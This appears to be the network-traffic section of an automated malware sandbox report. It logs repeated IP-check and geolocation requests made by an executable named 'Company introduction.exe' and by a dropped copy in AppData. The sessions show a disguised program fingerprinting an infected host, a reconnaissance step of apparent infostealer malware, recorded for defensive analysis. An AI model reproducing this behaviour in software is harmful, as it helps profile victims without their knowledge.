                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:11.788259983 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:12.423669100 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:12 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  11192.168.2.449758193.122.6.168807812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:12.075045109 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:12.706100941 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:12 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  12192.168.2.449761193.122.6.168808144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:13.021369934 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:13.647267103 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:13 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  13192.168.2.449762193.122.6.168807812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:13.338157892 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:13.967593908 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:13 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  14192.168.2.449765193.122.6.168808144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:14.442634106 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:14.999947071 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:14 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  15192.168.2.449769193.122.6.168808144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Jan 15, 2025 08:39:15.617134094 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 15, 2025 08:39:16.274338007 CET273INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:16 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.449734104.21.48.14437812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:04 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2025-01-15 07:39:04 UTC855INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:04 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241534
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tISPHQTfRX0mAXWdcaiDs8jl3azs1yQ8vYSijG8%2FazcFEcIGz0nhh0pxQFWCPgVRPICG5%2FIXMXNrOC1dhA3XLbeRAs3Ga4DHEWWneSvRI3EQmVuQm98XmJdQKPIBBk3T%2BJsZFONC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435bb8efd42e9-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1649&rtt_var=706&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1770770&cwnd=241&unsent_bytes=0&cid=94e8cf49d9cad8c0&ts=229&x=0"
                                                                                                                                                  2025-01-15 07:39:04 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.449735104.21.48.14437812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:05 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  2025-01-15 07:39:05 UTC863INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:05 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241534
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C9Zq5WAUcOI%2ByY8icedV7kq5PZxQ%2Fned%2BRnYzM%2FWAvYjKzT90TlZrHJpJMVxGiH7lQuviZYg0hOZXWkgYH%2F6rJM9WmhIEmXWFVI3o2LK92FMULrKQu%2FUqB0o3smbIcdvr%2BxrRLaB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435c0b8a08cda-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1980&min_rtt=1970&rtt_var=746&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1482233&cwnd=244&unsent_bytes=0&cid=4050d038fbe5a07a&ts=151&x=0"
                                                                                                                                                  2025-01-15 07:39:05 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.4  49740        104.21.48.14    443               7812  C:\Users\user\Desktop\Company introduction.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-15 07:39:06 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
                                                       Connection: Keep-Alive
2025-01-15 07:39:07 UTC  863                IN         HTTP/1.1 200 OK
                                                       Date: Wed, 15 Jan 2025 07:39:06 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 2241536
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y21QOajg0FcpP99it8HEyVg%2FAZStQqiOQPX0kjy2mHjut%2FSiCvN3nMSFSLYos6LKoNmo2XhKrbnJJClf%2BmdrSZG8rRkVkldGgBH1eEBb1eXGKdJrO0%2FeYfpxMKPa%2FCMY%2BK4OfpN%2F"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 902435c87d7e8c15-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1781&rtt_var=685&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1578378&cwnd=238&unsent_bytes=0&cid=1ed16997623605a5&ts=160&x=0"
2025-01-15 07:39:07 UTC  362                IN         Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.4  49741        104.21.48.14    443               8144  C:\Users\user\AppData\Roaming\FzXKnGk.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-15 07:39:07 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
                                                       Connection: Keep-Alive
2025-01-15 07:39:07 UTC  857                IN         HTTP/1.1 200 OK
                                                       Date: Wed, 15 Jan 2025 07:39:07 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 2241536
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a8ywdwWj8HbLX9kjYU7LishMVgoGcvnuwIp1VI2%2F1YKM7Oab%2FmdDTS9QDFLh9aZ2X9H2j31tf8s1pWVKlaxmUpXsXh02qnvHNzkcJ1sn4BLuPbIlDW%2Fz2JFOGLWP78j5SRjtQ%2B5C"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 902435c9ce748c15-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1764&min_rtt=1745&rtt_var=693&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1536842&cwnd=238&unsent_bytes=0&cid=56fa3e95404daa51&ts=215&x=0"
2025-01-15 07:39:07 UTC  362                IN         Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.4  49743        104.21.48.14    443               8144  C:\Users\user\AppData\Roaming\FzXKnGk.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-15 07:39:07 UTC  61                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
2025-01-15 07:39:08 UTC  855                IN         HTTP/1.1 200 OK
                                                       Date: Wed, 15 Jan 2025 07:39:07 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 2241537
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0AEiYOJU7YGkTL6mbqoSVGoTKNiMxfQfJmQbJfNkzmnfzdgO9fiEeHbzLxfuhCkqwVPmXirMKg397%2B%2BkuRHYmFGaOHGqQcwgpfOn3WWQ5JEEYAXiCUg%2BMpH0AllN3GfcbYeYy2fe"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 902435cebff142e9-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1708&rtt_var=656&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1647855&cwnd=241&unsent_bytes=0&cid=50af56b471b53a40&ts=121&x=0"
2025-01-15 07:39:08 UTC  362                IN         Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.4  49744        104.21.48.14    443               7812  C:\Users\user\Desktop\Company introduction.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-15 07:39:08 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
                                                       Connection: Keep-Alive
2025-01-15 07:39:08 UTC  867                IN         HTTP/1.1 200 OK
                                                       Date: Wed, 15 Jan 2025 07:39:08 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 2241537
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FQUfrV6aboADzhzJiAY%2Bvhxba4DYyRJ7EAjllEhtKQBIGnDu0%2BvCm1TQCcsStp5Af%2FhNx%2BpYBp2VXlNLcjtvxkI%2F%2FgaO%2FSZ6zf7QMNyg0Mdh38Qal1WN%2BhYf3UGZC59ALoOPORY8"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 902435d0696cc461-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1506&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1938911&cwnd=232&unsent_bytes=0&cid=8eca5204ff795cf2&ts=159&x=0"
2025-01-15 07:39:08 UTC  362                IN         Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.4  49747        104.21.48.14    443               8144  C:\Users\user\AppData\Roaming\FzXKnGk.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-15 07:39:09 UTC  61                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
2025-01-15 07:39:09 UTC  857                IN         HTTP/1.1 200 OK
                                                       Date: Wed, 15 Jan 2025 07:39:09 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 2241538
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7I0v8wwpZbIoKTATJuvnc8TE%2FQ25lXJsrIflUOMbbTy8331aN4cey2mhKUB46XxmdnFXeJcXUXaPtL0yFJ4N4tl0YyBaTPdM58tD%2FXJjDGjtHJPrgUzGuvwSqGAvro2%2FuND3Dev%2F"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 902435d68bd58cda-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1951&rtt_var=776&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1372180&cwnd=244&unsent_bytes=0&cid=baf7fa6091c58ddf&ts=150&x=0"
2025-01-15 07:39:09 UTC  362                IN         Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.4  49748        104.21.48.14    443               7812  C:\Users\user\Desktop\Company introduction.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-15 07:39:09 UTC  85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                       Host: reallyfreegeoip.org
                                                       Connection: Keep-Alive
2025-01-15 07:39:09 UTC  855                IN         HTTP/1.1 200 OK
                                                       Date: Wed, 15 Jan 2025 07:39:09 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 362
                                                       Connection: close
                                                       Age: 2241538
                                                       Cache-Control: max-age=31536000
                                                       cf-cache-status: HIT
                                                       last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sofZmrp5YmslKwEbJVitpzP3imAjeHMkbXinWjfkQyvQMb6t8zVtlsUszBYt3aVl%2BBx8QaqbYZANMmQB71%2Fk%2BrBx8BOCb54505bWokPt5iyGT8CQ0ZXXYI7DvKRAQMum0hxtnvXk"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 902435d82d6ec461-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1459&min_rtt=1446&rtt_var=569&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1880231&cwnd=232&unsent_bytes=0&cid=e28b46c42903fa6d&ts=137&x=0"
2025-01-15 07:39:09 UTC  362                IN         Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49751 | 104.21.48.1 | 443 | 8144 | C:\Users\user\AppData\Roaming\FzXKnGk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-15 07:39:10 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-15 07:39:10 UTC | 855 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Jan 2025 07:39:10 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2241539
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AkOxWWJm7KSizQSjVqJXLbiPD7Kj%2FBVLGwX6To3OIVvS5vC5gWbcyfHwNdK2aREFmV5om2ANg%2FuYx7hj2Pa7P2bnax4GlwdO5nsGuHXC9fbm3V5Y5yRRbaXFsg6VctmK3%2F070dtJ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 902435de5f6442e9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1593&rtt_var=611&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1769696&cwnd=241&unsent_bytes=0&cid=279ee828e6cf956f&ts=141&x=0"
